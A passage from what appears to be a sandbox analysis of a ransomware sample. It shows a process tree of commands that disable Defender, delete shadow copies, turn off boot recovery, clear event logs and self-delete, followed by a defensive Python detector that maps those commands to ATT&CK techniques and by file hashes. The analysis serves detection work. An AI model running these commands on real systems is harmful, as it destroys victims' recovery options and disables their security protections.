  [PID 1008] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  [PID 1704] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  [PID 1356] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    - Modifies security service
  [PID 1628] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [PID 1500] C:\Windows\system32\vssadmin.exe :: vssadmin.exe delete shadows /all /quiet
    - Interacts with shadow copies
  [PID 1564] C:\Windows\system32\wevtutil.exe :: wevtutil.exe cl system
    - Suspicious use of AdjustPrivilegeToken
  [PID 1916] C:\Windows\system32\wevtutil.exe :: wevtutil.exe cl security
    - Suspicious use of AdjustPrivilegeToken
  [PID 1904] C:\Windows\system32\wevtutil.exe :: wevtutil.exe cl application
    - Suspicious use of AdjustPrivilegeToken
  [PID 328] C:\Windows\System32\Wbem\wmic.exe :: wmic.exe SHADOWCOPY /nointeractive
    - Suspicious use of AdjustPrivilegeToken
  [PID 428] C:\Windows\System32\Wbem\wmic.exe :: wmic.exe shadowcopy delete
    - Suspicious use of AdjustPrivilegeToken
  [PID 2076] C:\Windows\system32\bcdedit.exe :: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    - Modifies boot configuration data using bcdedit
  [PID 2100] C:\Windows\system32\bcdedit.exe :: bcdedit.exe /set {default} recoveryenabled no
    - Modifies boot configuration data using bcdedit
  [PID 2120] C:\Windows\system32\cmd.exe :: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    [PID 2140] C:\Program Files\Windows Defender\MpCmdRun.exe :: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      - Deletes Windows Defender Definitions
  [PID 2152] C:\Windows\system32\cmd.exe :: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    [PID 2172] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: powershell Set-MpPreference -DisableIOAVProtection $true
      - Suspicious behavior: EnumeratesProcesses
  [PID 2244] C:\Windows\system32\cmd.exe :: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    [PID 2264] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: powershell Set-MpPreference -DisableRealtimeMonitoring $true
      - Suspicious behavior: EnumeratesProcesses
  [PID 2644] C:\Windows\system32\notepad.exe :: notepad.exe C:\4a7Z_HOW_TO_DECRYPT.txt
    - Opens file in notepad (likely ransom note)
  [PID 2652] C:\Windows\system32\cmd.exe :: cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"
    [PID 2676] C:\Windows\system32\PING.EXE :: ping.exe -n 5 127.0.0.1
      - Runs ping.exe
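Read top to bottom, the process tree is one pre-encryption procedure run entirely through signed Windows binaries: stop and disable the VSS, Windows Backup (wbengine, SDRSVC) and other services, rewrite the Defender policy keys and set the Defender services and drivers to start type 4, disable the Defender scheduled tasks, delete shadow copies twice (vssadmin and wmic), turn off boot recovery with bcdedit, clear the System, Security and Application logs, strip Defender's definitions with MpCmdRun, and finally delete the dropper after a ping delay. Each step on its own is something an administrator might run; the detection value is in the combination and in the fact that every child traces back to one unsigned executable in a user's Temp directory. The Python below is an added example for this page, not sandbox output and not Hive code: it takes process-creation rows transcribed from the tree (pid, parent pid, command line), maps each command line to the ATT&CK technique it implements (T1490 Inhibit System Recovery, T1489 Service Stop, T1562.001 Disable or Modify Tools, T1070.001 Clear Windows Event Logs, T1070.004 File Deletion), issues a verdict only when recovery inhibition and defence impairment both appear alongside a third technique, and rolls the hits up to the common ancestor so the verdict attaches to the dropper rather than to each net.exe or reg.exe child. The rows are a constructed subset of the tree and the dropper's own parent PID (1000) is invented; the report does not record it. One caveat the tree itself illustrates: Windows 7 recycles PIDs quickly, and 964, 1108, 1252, 1500 and 1860 each appear above for two different processes, so a production detector should key on a process GUID or on (PID, creation time) rather than on the bare PID this example uses.

```python
"""Map the LOLBin command lines from the process tree to ATT&CK techniques and
roll the hits up to the dropper. Added example, not report output or Hive code."""
import re
from collections import defaultdict

SAMPLE = "fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"
DROPPER = r"C:\Users\Admin\AppData\Local\Temp" + "\\" + SAMPLE

# Constructed process-creation events transcribed from the tree:
# (pid, parent_pid, command_line). The dropper's parent pid 1000 is assumed.
SAMPLE_EVENTS = [
    (744, 1000, f'"{DROPPER}"'),
    (520, 744, 'net.exe stop "NetMsmqActivator" /y'),
    (1820, 744, 'net.exe stop "VSS" /y'),
    (2036, 744, 'net.exe stop "wbengine" /y'),
    (1076, 744, 'sc.exe config "VSS" start= disabled'),
    (1352, 744, r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'),
    (1356, 744, r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'),
    (1860, 744, r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'),
    (1500, 744, 'vssadmin.exe delete shadows /all /quiet'),
    (1564, 744, 'wevtutil.exe cl system'),
    (1916, 744, 'wevtutil.exe cl security'),
    (1904, 744, 'wevtutil.exe cl application'),
    (328, 744, 'wmic.exe SHADOWCOPY /nointeractive'),  # enumeration only, not flagged
    (428, 744, 'wmic.exe shadowcopy delete'),
    (2076, 744, 'bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'),
    (2100, 744, 'bcdedit.exe /set {default} recoveryenabled no'),
    (2120, 744, r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    (2140, 2120, r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    (2244, 744, 'cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true'),
    (2264, 2244, 'powershell Set-MpPreference -DisableRealtimeMonitoring $true'),
    (2652, 744, f'cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "{DROPPER}"'),
]

# (ATT&CK technique id, label, regex applied to the lower-cased command line)
RULES = [
    ("T1490", "shadow copies deleted",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcop(y|ies)\s+delete")),
    ("T1490", "boot recovery disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)")),
    ("T1490", "VSS/backup service stopped or disabled",
     re.compile(r'(net1?(\.exe)?\s+stop|sc(\.exe)?\s+config)\s+"?(vss|wbengine|sdrsvc)\b')),
    ("T1489", "service stopped or set to disabled",
     re.compile(r"net1?(\.exe)?\s+stop\s+|sc(\.exe)?\s+config\s+.*start=\s*disabled")),
    ("T1562.001", "Defender definitions removed",
     re.compile(r'mpcmdrun(\.exe)?"?\s+-removedefinitions')),
    ("T1562.001", "Defender disabled via Set-MpPreference",
     re.compile(r"set-mppreference\s+-disable")),
    ("T1562.001", "Defender policy key written",
     re.compile(r"policies\\microsoft\\windows defender")),
    ("T1562.001", "Defender service/driver start type set to 4",
     re.compile(r'services\\(windefend|wdboot|wdfilter|wdnisdrv|wdnissvc|securityhealthservice)"\s+/v\s+"start"\s+/t\s+reg_dword\s+/d\s+"4"')),
    ("T1562.001", "Defender scheduled task disabled",
     re.compile(r"schtasks.*windows defender.*/disable")),
    ("T1070.001", "event log cleared",
     re.compile(r"wevtutil(\.exe)?\s+cl\s+(system|security|application)")),
    ("T1070.004", "self-deletion after ping delay",
     re.compile(r"ping(\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s*&&\s*del\s+")),
]


def classify(cmdline: str) -> set:
    """Techniques (id, label) a single command line triggers."""
    low = cmdline.lower()
    return {(tid, label) for tid, label, rx in RULES if rx.search(low)}


def analyze(events) -> dict:
    """technique id -> set of pids whose command line triggered it."""
    hits = defaultdict(set)
    for pid, _ppid, cmd in events:
        for tid, _label in classify(cmd):
            hits[tid].add(pid)
    return dict(hits)


def verdict(hits: dict) -> str:
    """Call it ransomware staging only when recovery inhibition and defence
    impairment both occur together with at least one further technique."""
    if {"T1490", "T1562.001"}.issubset(hits) and len(hits) >= 3:
        return "ransomware pre-encryption chain"
    return "suspicious" if hits else "clean"


def attribute_to_root(events) -> dict:
    """root pid -> techniques seen anywhere in its subtree. The root is the
    top-most ancestor that has its own event row. Assumes unique pids."""
    parent = {pid: ppid for pid, ppid, _ in events}

    def root(pid):
        while parent.get(pid) in parent:
            pid = parent[pid]
        return pid

    rolled = defaultdict(set)
    for pid, _ppid, cmd in events:
        for tid, _label in classify(cmd):
            rolled[root(pid)].add(tid)
    return dict(rolled)


if __name__ == "__main__":
    h = analyze(SAMPLE_EVENTS)
    print(verdict(h), attribute_to_root(SAMPLE_EVENTS))
```

The rule split matters for the false-positive budget: a lone `net stop Spooler` only trips T1489 and stays "suspicious", whereas stopping VSS or wbengine also counts toward T1490, and the verdict needs both T1490 and T1562.001 before it names the chain. The `wmic.exe SHADOWCOPY /nointeractive` row is deliberately left unflagged because it only enumerates shadow copies; the deletion that follows is what triggers the rule.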
Network
MITRE ATT&CK Enterprise v6
Downloads
- MD5: e8581e1c0975e92f67bf014e1e1adb97
  SHA1: 22b2946186cdfbd125da2de12550df1394b6548e
  SHA256: b5a8f263eaf410d0353d41f31c68080dcc3ac5f6272de7970b23f0b47e55cfd6
  SHA512: cc2ec7f112a1629d47687dfb41988404a107ec79644f222121478ce0134e0f6410d6496988e45b681f463ba71d56666afc2355f92a10501e9c094bc4665085ae
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 83496c4d15bce978d48adfed8fe5b24d
  SHA1: b2053c07f8f4a8028473f80717bf83befc059edd
  SHA256: d9aa188d7735b48f0071c28548977545b6e8bf001ac6132bcf7c2340ca347ae4
  SHA512: 1f1bef015933cb3b1ec1a60211a40e09c58d0a1b562c96e55d5851c1a5c2815cac2b3c847d66b935adf97fb74d1f0863a5a4fc7c29fe47395f81f8006a1681a0